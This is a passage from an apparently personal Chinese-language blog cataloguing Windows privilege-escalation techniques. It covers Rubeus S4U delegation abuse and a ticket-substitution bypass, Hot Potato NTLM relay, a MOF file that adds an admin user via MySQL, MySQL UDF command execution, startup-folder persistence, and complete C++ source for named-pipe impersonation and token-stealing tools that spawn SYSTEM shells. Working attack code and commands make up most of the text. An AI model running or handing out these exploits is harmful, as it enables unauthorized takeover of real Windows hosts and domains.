<p><code>Rubeus.exe s4u /user:evilsystem$ /rc4:B1739F7FC8377E25C77CFA2DFBDC3EC7 /impersonateuser:administrator /msdsspn:cifs/dm2008 /ptt</code> 写入票据</p>
<p>然后我在本机使用以上方法后klist一下，发现确实存在票据</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217140737.png" alt="QQ截图20210217140737"></p>
<p>但是dir \test1\c$时本机莫名其妙不能进行kerberos验证，我服了》。。但不管怎样，我们拿到银票了</p>
<h4 id="敏感用户不可委派的绕过"><a href="#敏感用户不可委派的绕过" class="headerlink" title="敏感用户不可委派的绕过"></a>敏感用户不可委派的绕过</h4><p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141050.png" alt="QQ截图20210217141050"></p>
<p>若我们的administrator用户被设置为敏感用户不可委派或者被加入保护组，按理说他的访问就不能进行委派。</p>
<p>我们在以administrator账户身份进行S4U时，只能进行S4U2SELF，不能进行S4U2PROXY。我们用 <code>Rubeus.exe s4u /user:evilsystem$ /rc4:B1739F7FC8377E25C77CFA2DFBDC3EC7 /impersonateuser:administrator /msdsspn:cifs/dm2008 /ptt</code>继续实验administrator，发现确实是这样</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141131.png" alt="QQ截图20210217141131"></p>
<p>此时我们用 rubeus.exe describe /ticker:S4Ubase64加密的票据</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141313.png" alt="QQ截图20210217141313"></p>
<p>可以发现servicename并没有指定某个服务，仅仅只有一个账户.即发生了服务名称缺失的问题。很简单，把票据修改一下就行了.网上很多说用这个工具<br><a target="_blank" rel="noopener" href="https://www.pkisolutions.com/tools/asn1editor/">https://www.pkisolutions.com/tools/asn1editor/</a><br>但实际上rubeus也能完成票据修改<code>rubeus.exe tgssub /ticket:xxx /altservice:cifs/test1 /ptt</code></p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141325.png" alt="QQ截图20210217141325"></p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217141339.png" alt="QQ截图20210217141339"></p>
<p>完事</p>
<h2 id="POTATO-家族"><a href="#POTATO-家族" class="headerlink" title="POTATO 家族"></a>POTATO 家族</h2><h3 id="hot-potato"><a href="#hot-potato" class="headerlink" title="hot potato"></a>hot potato</h3><p>热土豆提权。很早前就听说过了，但一直没去了解过。前置知识是ntlm relay,可以去了解了解。 potato家族有很多，hot potato只是其中一种提权方式。<br>我环境有问题，不能很好的复现🙃，抓包分析啥的先咕咕吧。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/foxglovesec/Potato%F0%9F%91%88%E5%B7%A5%E5%85%B7">https://github.com/foxglovesec/Potato👈工具</a><br><a target="_blank" rel="noopener" href="https://foxglovesecurity.com/2016/01/16/hot-potato/">https://foxglovesecurity.com/2016/01/16/hot-potato/</a> 👈HOT POTATO技术文档，国内基本上翻译这个来的。</p>
<p>提权步骤大概是这个流程<br>1.本地nbns服务欺骗<br>2.wpad劫持<br>3.HTTP-&gt;SMB 的 ntlm relay</p>
<p>1.本地nbns服务欺骗</p>
<p>Windows域名解析规则是<br>本地HOST文件-》dns查询-》NBNS或者LLMNR查询<br>一旦本地发出NBNS查询，我们本地就可以迅速响应，啪的一下就响应了，很快啊，本地发包很快，只要发出NBNS包基本上都能被我们本地发包响应。<br>但是以上步骤还是有一些细节的：我们当前并非管理员权限，大几率是无法嗅探本地流量的,如果我们能够事先知道目标主机期望NBNS查询获得的主机名，我们可以伪造一个响应，对发送NBNS查询的那个主机快速的大量发送NBNS响应 .但是nbns流量包还有个叫特征码的东西，请求包和响应包的特征码必须相同，所以我们被迫发送65536个包爆破这个特征码——本地发包速度很快，本地NBNS欺骗成功率基本上在100%。</p>
<p>2.WPAD劫持</p>
<p>NBNS欺骗后我们就可以劫持WPAD的域名，把自己伪造称WPAD并返回自定义的PAC文件。意味着我们可以把本地发出的所有流量重定向。</p>
<p>3.RELAY</p>
<p>在现在这个年代，SMB-&gt;SMB的relay很少用到了，微软 禁用了同协议的NTLM认证 ，成功率很低。<br>但是HTTP-&gt;SMB的relay还是有的。HOT POTATO就是利用的这一点。<br>我们可以把主机发出的HTTP请求重定向到我们自定义的网页A，而网页A需要NTLM认证，我们就可以进行HTTP-&gt;SMB的relay’了。当HTTP请求来自于高权限的账户时，例如是来自windows 更新服务的请求，命令就会以”NT AUTHORITY\SYSTEM”权限运行。</p>
<p>HOT POTATO 根据Windows版本的不同，需要等待高权限用户NTLM认证来到的时间也不同。一般来说，<br>WIN7是瞬间就可以提权的<br>Windows Server 2012 R2,Windows Server 2012,Windows 8.1,Windows 8有一个自动更新机制，会每天下载证书信任列表(CTLs)<br>,etc</p>
<h2 id="MYSQL下的提权技术"><a href="#MYSQL下的提权技术" class="headerlink" title="MYSQL下的提权技术"></a>MYSQL下的提权技术</h2><h3 id="MOF提权"><a href="#MOF提权" class="headerlink" title="MOF提权"></a>MOF提权</h3><p>在c:/windows/system32/wbem/mof/目录下的nullevt.mof每分钟都会有一个特定的时间去执行一次（由”And TargetInstance.Second = 5″;控制，这里输入5就是每分钟的第五秒执行。 那么把cmd命令添加到nullevt.mof中，cmd命令就会自动执行了。</p>
<p>前提是我们要能进入数据库进行操作，且mysql数据库的权限尽可能高才更有利。同时secure-file-priv 要为空（ mysql 5.6.34版本以后 secure_file_priv的值默认为NULL,禁止所有文件导入导出功能）</p>
<p>我们伪造的MOF文件格式如下</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#pragma namespace(&quot;\\\\.\\root\\subscription&quot;) </span><br><span class="line"></span><br><span class="line">instance of __EventFilter as $EventFilter </span><br><span class="line">&#123; </span><br><span class="line">    EventNamespace &#x3D; &quot;Root\\Cimv2&quot;; </span><br><span class="line">    Name  &#x3D; &quot;filtP2&quot;; </span><br><span class="line">    Query &#x3D; &quot;Select * From __InstanceModificationEvent &quot; </span><br><span class="line">            &quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot; </span><br><span class="line">            &quot;And TargetInstance.Second &#x3D; 5&quot;; </span><br><span class="line">    QueryLanguage &#x3D; &quot;WQL&quot;; </span><br><span class="line">&#125;; </span><br><span class="line"></span><br><span class="line">instance of ActiveScriptEventConsumer as $Consumer </span><br><span class="line">&#123; </span><br><span class="line">    Name &#x3D; &quot;consPCSV2&quot;; </span><br><span class="line">    ScriptingEngine &#x3D; &quot;JScript&quot;; </span><br><span class="line">    ScriptText &#x3D; </span><br><span class="line">    &quot;var WSH &#x3D; new ActiveXObject(\&quot;WScript.Shell\&quot;)\nWSH.run(\&quot;net.exe user admin admin &#x2F;add\&quot;)&quot;;   &#x2F;&#x2F;修改此处即可</span><br><span class="line">&#125;; </span><br><span class="line"></span><br><span class="line">instance of __FilterToConsumerBinding </span><br><span class="line">&#123; </span><br><span class="line">    Consumer   &#x3D; $Consumer; </span><br><span class="line">    Filter &#x3D; $EventFilter; </span><br><span class="line">&#125;; </span><br></pre></td></tr></table></figure>
<p>修改上面的cmd部分即可实现以管理员身份执行各种命令。<br>然后我们使用mysql下的命令 ，将mof覆盖过去。<br>待我们的命令被执行后，即代表提权成功。<br>Windows 2003似乎成功率蛮高的，WIN7试了试没反应。。。</p>
<h3 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h3><p>（这个也可以linux提权</p>
<p>udf，即自定义函数（user define function）</p>
<p>MYSQL可以自定义函数的。自定义函数在Windows下是以DLL文件存在于MYSQL的插件文件夹里面的（linux则是以os的形式）。我们可以自定义一个恶意dll，里面存放着可以执行系统命令的 函数。然后交给mysql以数据库权限执行。</p>
<p>前提：我们能操作数据库，且数据库权限必须很高（我们用这个方法提权到的权限就是数据库的权限</p>
<p>那么这个dll文件哪里来呢。sqlmap和msf都有。sqlmap下的 sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ 就是这个dll文件的编码版本。我们使用sqlmap下的sqlmap/extra/cloak/cloak.py对其进行解码获得dll文件。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">python .&#x2F;cloak.py -d -i .&#x2F;lib_mysqludf_sys.dll_  即可获得dll文件</span><br></pre></td></tr></table></figure>
<p>然后我们把dll文件放入mysql的插件文件夹，命名为udf.dll。插件文件夹可以通过命令</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">show variables like &quot;%plugin%&quot;;获得  （&#x2F;lib&#x2F;plugin文件夹需要自己创建）</span><br></pre></td></tr></table></figure>
<p>至于怎么把dll放入插件文件夹</p>
<p>1.直接粘贴复制 （权限可能不够<br>2.使用命令 select load_file(‘udf.dll’) into dumpfile “PLUGIN的路径”;(需要secure_file_priv为空</p>
<p>总之，如果把udf.dll放入plugin文件夹后，我们就可以执行以下操作提权了。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">create funtion sys_eval returns string soname &quot;udf.dll&quot;;</span><br><span class="line">select sys_eval(&#39;cmd&#39;);</span><br></pre></td></tr></table></figure>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144509.png" alt="QQ截图20210217144509"></p>
<h3 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h3><p>说白了，就是通过mysql的高权限，向windows开机启动项文件夹里放入恶意vbs或者bat脚本,机器重启后自动执行。怎么让机器重启？等管理员或者 一些可导致服务器蓝屏的EXP<br>启动项路径一般为：<br>C:\Documents and Settings\All Users\「开始」菜单\程序\启动<br>C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">select load_file(&quot;xxx&quot;) into dumpfile &quot;xxxx&quot;;</span><br></pre></td></tr></table></figure>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144534.png" alt="QQ截图20210217144534"></p>
<p>没什么好说的</p>
<h2 id="命名管道提权"><a href="#命名管道提权" class="headerlink" title="命名管道提权"></a>命名管道提权</h2><p>提权方式为 令牌模仿。 Token Impersonation .</p>
<p>meterpreter的getsystem的提取方法之一就是这个方法</p>
<p>提权过程为从administrator用户提到SYSTEM权限。从普通用户提权到admin及以上权限是不可取的，因为普通用户创建的命名管道没有 <code>SeImpersonatePrivilege</code>，在复制令牌时会出现1346错误。</p>
<p>该方法技术细节为：以管理员权限创建一个命名管道，再通过创建SYSTEM权限服务，让服务连上命名管道，随后我们通过模拟客户端，获得SYSTEM权限的令牌，随后将其复制，再用复制后的令牌创建新进程（如CMD)，新进程的权限即SYSTEM权限。</p>
<p>这里贴上实现代码.<br>首先是被创建的服务的实现代码，该服务启动后会不断向服务器命名管道建立链接<br>生成好后，是Service.exe</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#include&lt;Windows.h&gt;</span><br><span class="line">#include&lt;iostream&gt;</span><br><span class="line">SERVICE_STATUS m_ServiceStatus;</span><br><span class="line">SERVICE_STATUS_HANDLE m_ServiceStatusHandle;</span><br><span class="line">BOOL bRunning;</span><br><span class="line">void WINAPI ServiceMain(DWORD argc, LPTSTR* argv);</span><br><span class="line">void WINAPI HandlerFunc(DWORD code);</span><br><span class="line">int main() &#123;</span><br><span class="line">	WCHAR Servicename[] &#x3D; L&quot;ServiceA&quot;;</span><br><span class="line">	SERVICE_TABLE_ENTRY Table[] &#x3D; &#123; &#123;Servicename,ServiceMain&#125;,&#123;NULL,NULL&#125; &#125;;</span><br><span class="line">	StartServiceCtrlDispatcher(Table);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void WINAPI ServiceMain(DWORD argc, LPTSTR* argv) &#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	m_ServiceStatus.dwServiceType &#x3D; SERVICE_WIN32_OWN_PROCESS;</span><br><span class="line">	m_ServiceStatus.dwCurrentState &#x3D; SERVICE_START_PENDING;</span><br><span class="line">	m_ServiceStatus.dwControlsAccepted &#x3D; SERVICE_ACCEPT_STOP;</span><br><span class="line">	m_ServiceStatus.dwWin32ExitCode &#x3D; 0;</span><br><span class="line">	m_ServiceStatus.dwServiceSpecificExitCode &#x3D; 0;</span><br><span class="line">	m_ServiceStatus.dwCheckPoint &#x3D; 0;</span><br><span class="line">	m_ServiceStatus.dwWaitHint &#x3D; 0;</span><br><span class="line"></span><br><span class="line">	m_ServiceStatusHandle &#x3D; RegisterServiceCtrlHandler(L&quot;ServiceA&quot;, HandlerFunc);</span><br><span class="line">	m_ServiceStatus.dwCurrentState &#x3D; SERVICE_RUNNING;</span><br><span class="line">	m_ServiceStatus.dwCheckPoint &#x3D; 0;</span><br><span class="line">	m_ServiceStatus.dwWaitHint &#x3D; 0;</span><br><span class="line">	SetServiceStatus(m_ServiceStatusHandle, &amp;m_ServiceStatus);</span><br><span class="line">	bRunning &#x3D; true;</span><br><span class="line">	while (bRunning) &#123;</span><br><span class="line">	LPCWSTR PipeName &#x3D; L&quot;\\\\.\\pipe\\testpipe&quot;;</span><br><span class="line">	HANDLE PipeHandle&#x3D;NULL;</span><br><span class="line">	BOOL PipeInstance;</span><br><span class="line">	WCHAR message[512] &#x3D; &#123; 0 &#125;;</span><br><span class="line">	DWORD bytesWritten &#x3D; 0;</span><br><span class="line">	BOOL Flag &#x3D; true;</span><br><span class="line">	wchar_t message2[] &#x3D; L&quot;HELL&quot;;</span><br><span class="line">	DWORD messageLength &#x3D; lstrlen(message2) * 2;</span><br><span class="line">	do &#123;</span><br><span class="line">		PipeHandle &#x3D; CreateFile(PipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);</span><br><span class="line">	&#125; while (PipeHandle &#x3D;&#x3D; INVALID_HANDLE_VALUE);</span><br><span class="line"></span><br><span class="line">	WriteFile(PipeHandle, &amp;message2, messageLength, &amp;bytesWritten, NULL);</span><br><span class="line"></span><br><span class="line">	Flag &#x3D; ReadFile(PipeHandle, &amp;message, 512, &amp;bytesWritten, NULL);</span><br><span class="line">	std::cout &lt;&lt; &quot;Message:&quot; &lt;&lt; message &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void WINAPI HandlerFunc(DWORD code) &#123;</span><br><span class="line">	switch (code) &#123;</span><br><span class="line">	case SERVICE_CONTROL_PAUSE:</span><br><span class="line">		m_ServiceStatus.dwCurrentState &#x3D; SERVICE_PAUSED;</span><br><span class="line">		break;</span><br><span class="line">	case SERVICE_CONTROL_CONTINUE:</span><br><span class="line">		m_ServiceStatus.dwCurrentState &#x3D; SERVICE_RUNNING;</span><br><span class="line">		break;</span><br><span class="line">	case SERVICE_CONTROL_STOP:</span><br><span class="line">		m_ServiceStatus.dwWin32ExitCode &#x3D; 0;</span><br><span class="line">		m_ServiceStatus.dwCurrentState &#x3D; SERVICE_STOPPED;</span><br><span class="line">		m_ServiceStatus.dwCheckPoint &#x3D; 0;</span><br><span class="line">		m_ServiceStatus.dwWaitHint &#x3D; 0;</span><br><span class="line"></span><br><span class="line">		SetServiceStatus(m_ServiceStatusHandle, &amp;m_ServiceStatus);</span><br><span class="line">		bRunning &#x3D; false;</span><br><span class="line">		break;</span><br><span class="line">	case SERVICE_CONTROL_INTERROGATE:</span><br><span class="line">		break;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后是主体，命名管道服务器。生成后是Server.exe</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#include&lt;Windows.h&gt;</span><br><span class="line">#include&lt;iostream&gt;</span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">	LPCWSTR pipeName &#x3D; L&quot;\\\\.\\pipe\\testpipe&quot;;</span><br><span class="line">	LPVOID pipeBuffer &#x3D; NULL;</span><br><span class="line">	HANDLE serverPipe;</span><br><span class="line">	DWORD readBytes &#x3D; 0;</span><br><span class="line">	DWORD readBuffer &#x3D; 0;</span><br><span class="line">	int err &#x3D; 0;</span><br><span class="line">	BOOL isPipeConnected;</span><br><span class="line">	BOOL isPipeOpen;</span><br><span class="line">	wchar_t message[] &#x3D; L&quot;HELL&quot;;</span><br><span class="line">	DWORD messageLenght &#x3D; lstrlen(message) * 2;</span><br><span class="line">	DWORD bytesWritten &#x3D; 0;</span><br><span class="line">	WCHAR message2[512] &#x3D; &#123; 0 &#125;;</span><br><span class="line">&#x2F;&#x2F;Open a Named Pipe,Wait for a connection</span><br><span class="line">	std::wcout &lt;&lt; &quot;Creating named pipe &quot; &lt;&lt; pipeName &lt;&lt; std::endl;</span><br><span class="line">	serverPipe &#x3D; CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL);</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;Create a service of system to connect to our NamedPipe.</span><br><span class="line"></span><br><span class="line">	char servicename[] &#x3D; &quot;Service.exe&quot;;</span><br><span class="line">	char servicepath[_MAX_PATH];</span><br><span class="line">	SERVICE_STATUS status;</span><br><span class="line">	GetModuleFileNameA(LoadLibraryA(servicename), servicepath, sizeof(servicepath));</span><br><span class="line">	SC_HANDLE scManager &#x3D; OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);</span><br><span class="line">	if (GetLastError() &#x3D;&#x3D; 0) &#123;</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;ERROR OpenSCManager:&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	SC_HANDLE scService &#x3D; CreateServiceA(scManager, servicename, servicename,</span><br><span class="line">		SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,</span><br><span class="line">		servicepath, NULL, NULL, NULL, NULL, NULL);</span><br><span class="line">	if (!scService) &#123;</span><br><span class="line">		if (GetLastError() &#x3D;&#x3D; 1073) &#123;</span><br><span class="line">			std::cout &lt;&lt; &quot;The Service has been exsisted&quot; &lt;&lt; std::endl;</span><br><span class="line">		&#125;</span><br><span class="line">		else &#123;</span><br><span class="line">			std::cout &lt;&lt; &quot;ERROR CreateServiceA:&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	SC_HANDLE scServiceA &#x3D; OpenServiceA(scManager, servicename, SERVICE_ALL_ACCESS);</span><br><span class="line">	if (StartService(scServiceA, 0, NULL)) &#123;</span><br><span class="line">		std::cout&lt;&lt;&quot;service Start success&quot;&lt;&lt;std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		if (GetLastError() &#x3D;&#x3D; 1056) &#123;</span><br><span class="line">			std::cout &lt;&lt; &quot;service is running,don&#39;t need to start again&quot; &lt;&lt; std::endl;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#x2F;&#x2F;Connect !</span><br><span class="line">	isPipeConnected &#x3D; ConnectNamedPipe(serverPipe, NULL);</span><br><span class="line"></span><br><span class="line">	if (isPipeConnected) &#123;</span><br><span class="line">		std::wcout &lt;&lt; &quot;Incoming connection to &quot; &lt;&lt; pipeName &lt;&lt; std::endl;</span><br><span class="line">		ReadFile(serverPipe, &amp;message2, 512, &amp;bytesWritten, NULL);</span><br><span class="line">		std::cout &lt;&lt; message2;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;Does not connected Error: &quot;&lt;&lt;GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	std::wcout &lt;&lt; &quot;Sending message: &quot; &lt;&lt; message &lt;&lt; std::endl;</span><br><span class="line">	WriteFile(serverPipe, message, messageLenght, &amp;bytesWritten, NULL);</span><br><span class="line">&#x2F;&#x2F;Toekn Impersonation</span><br><span class="line">	std::wcout &lt;&lt; &quot;Impersonating the client...&quot; &lt;&lt; std::endl;</span><br><span class="line">	if (!ImpersonateNamedPipeClient(serverPipe)) &#123;</span><br><span class="line">		std::cout&lt;&lt;&quot;ImpersonateNamedPipeClient ERROR: &quot;&lt;&lt;GetLastError()&lt;&lt;std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">	std::cout &lt;&lt; &quot;ImpersonateNamedPipeClient success&quot; &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	STARTUPINFOA si;</span><br><span class="line">	PROCESS_INFORMATION pi &#x3D; &#123;&#125;;</span><br><span class="line">	ZeroMemory(&amp;pi, sizeof(pi));</span><br><span class="line">	ZeroMemory(&amp;si, sizeof(si));</span><br><span class="line">	si.cb &#x3D; sizeof(si);</span><br><span class="line">	HANDLE token;</span><br><span class="line">	if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &amp;token)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;GetCurrentThread ERROR:&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	CHAR command1[] &#x3D; &quot;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&quot;;</span><br><span class="line">	WCHAR command2[] &#x3D; L&quot;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&quot;;</span><br><span class="line">	HANDLE Token;</span><br><span class="line">	if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS,NULL, SecurityImpersonation, TokenImpersonation,&amp;Token)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;DuplicateTokenEx ERROR:&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;Impersonate completed&quot; &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	if (!CreateProcessAsUserA(token, NULL, command1, NULL, NULL, TRUE, 0, NULL, NULL, &amp;si, &amp;pi)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;CreateProcessAsUserA ERROR:&quot; &lt;&lt; GetLastError() &lt;&lt;&quot; Now Use CreateProcessWithTokenW&quot;&lt;&lt; std::endl;</span><br><span class="line">		if (!CreateProcessWithTokenW(token, LOGON_NETCREDENTIALS_ONLY, NULL, command2, NULL, NULL, NULL, (LPSTARTUPINFOW)&amp;si, &amp;pi)) &#123;</span><br><span class="line">			std::cout &lt;&lt; &quot;CreateProcessWithTokenW ERROR:&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">		&#125;</span><br><span class="line">		else &#123;</span><br><span class="line">			std::cout &lt;&lt; &quot;CreateProcessWithTokenW success&quot; &lt;&lt; std::endl;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;CreateProcessWithTokenW success&quot; &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	while(1)&#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们生成了Service.exe,然后把他移到Server.exe同级目录，以管理员权限运行Server.exe,即可达到admin-》system的提权。</p>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144553.png" alt="QQ截图20210217144553"></p>
<p>程序写了四天终于写好了。。WIN7下可以实现完美提权。<br>项目地址:<a target="_blank" rel="noopener" href="https://github.com/ConsT27/EvilNamedPipe/tree/1.0">https://github.com/ConsT27/EvilNamedPipe/tree/1.0</a></p>
<h2 id="令牌窃取"><a href="#令牌窃取" class="headerlink" title="令牌窃取"></a>令牌窃取</h2><p>SYSTEM-&gt;本机上其他用户（包括域用户）(好家伙，只要本机有system权限，域管敢在本机上创建进程就直接能拿到域管权限） 或者admin获取debug权限后去获取SYSTEM权限（这里有一个细节点，只有owner为administrator的SYSTEM进程才能被利用，比如lsass，dllhost)</p>
<p>技术细节:通过寻找高权限开启的进程，再复制其令牌用以创建新进程，即可达到提权目的</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#include &lt;iostream&gt;</span><br><span class="line">#include &lt;Windows.h&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F;Only administrator can get debug priv</span><br><span class="line">BOOL GetDebugPriv() &#123;</span><br><span class="line">	HANDLE Token;</span><br><span class="line">	TOKEN_PRIVILEGES tp;</span><br><span class="line">	LUID Luid;</span><br><span class="line">	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &amp;Token)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;OpenProcessToken ERROR&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">		return false;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	tp.PrivilegeCount &#x3D; 1;</span><br><span class="line">	tp.Privileges[0].Attributes &#x3D; SE_PRIVILEGE_ENABLED;</span><br><span class="line">	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &amp;Luid)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;LookupPrivilegeValue ERROR&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">		return false;</span><br><span class="line">	&#125;</span><br><span class="line">	tp.Privileges[0].Luid &#x3D; Luid;</span><br><span class="line">	if (!AdjustTokenPrivileges(Token, FALSE, &amp;tp, sizeof(tp), NULL, NULL) )&#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;AdjustTokenPrivileges ERROR&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">		return false;</span><br><span class="line">	&#125;</span><br><span class="line">	if (GetLastError() &#x3D;&#x3D; ERROR_NOT_ALL_ASSIGNED) &#123;</span><br><span class="line">		return false;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		return true;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">int main(int argc, char* argv[]) &#123;</span><br><span class="line">	HANDLE t_process;</span><br><span class="line">	HANDLE token &#x3D; NULL;</span><br><span class="line">	HANDLE token_bak &#x3D; NULL;</span><br><span class="line">	DWORD process_id;</span><br><span class="line">	sscanf_s(argv[1], &quot;%ul&quot;, &amp;process_id);</span><br><span class="line">	WCHAR command[] &#x3D; L&quot;C:\\Windows\\System32\\cmd.exe&quot;;</span><br><span class="line">	STARTUPINFO startupInfo;</span><br><span class="line">	PROCESS_INFORMATION processInformation;</span><br><span class="line">	ZeroMemory(&amp;startupInfo, sizeof(STARTUPINFO));</span><br><span class="line">	ZeroMemory(&amp;processInformation, sizeof(PROCESS_INFORMATION));</span><br><span class="line">	startupInfo.cb &#x3D; sizeof(STARTUPINFO);</span><br><span class="line">	std::cout &lt;&lt; argv[1] &lt;&lt; std::endl;</span><br><span class="line">	std::cout &lt;&lt; &quot;Openning process PID:&quot; &lt;&lt; process_id &lt;&lt; std::endl;</span><br><span class="line">	if (GetDebugPriv()&#x3D;&#x3D; TRUE) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;Got the debug priv&quot; &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;GetDebugPriv ERROR&quot; &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	system(&quot;whoami &#x2F;priv&quot;);</span><br><span class="line">	t_process &#x3D; OpenProcess(PROCESS_ALL_ACCESS, true, process_id);</span><br><span class="line">	if (!t_process) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;OpenProcess ERROR&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	if (!OpenProcessToken(t_process, TOKEN_ALL_ACCESS, &amp;token)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;OpenProcessToken ERROR&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &amp;token_bak)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;DuplicateTokenEx ERROR&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	if (!CreateProcessWithTokenW(token_bak, LOGON_WITH_PROFILE, NULL, command, 0, NULL, NULL, &amp;startupInfo, &amp;processInformation)) &#123;</span><br><span class="line">		std::cout &lt;&lt; &quot;CreateProcessWithTokenW ERROR&quot; &lt;&lt; GetLastError() &lt;&lt; std::endl;</span><br><span class="line">	&#125;</span><br><span class="line">	return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://const27blog.oss-cn-beijing.aliyuncs.com/img/QQ%E6%88%AA%E5%9B%BE20210217144620.png" alt="QQ截图20210217144620"></p>
<p>这是在win7下的测试结果 const\administrator 是域控</p>

  </div>
</article>



        
          <div id="footer-post-container">
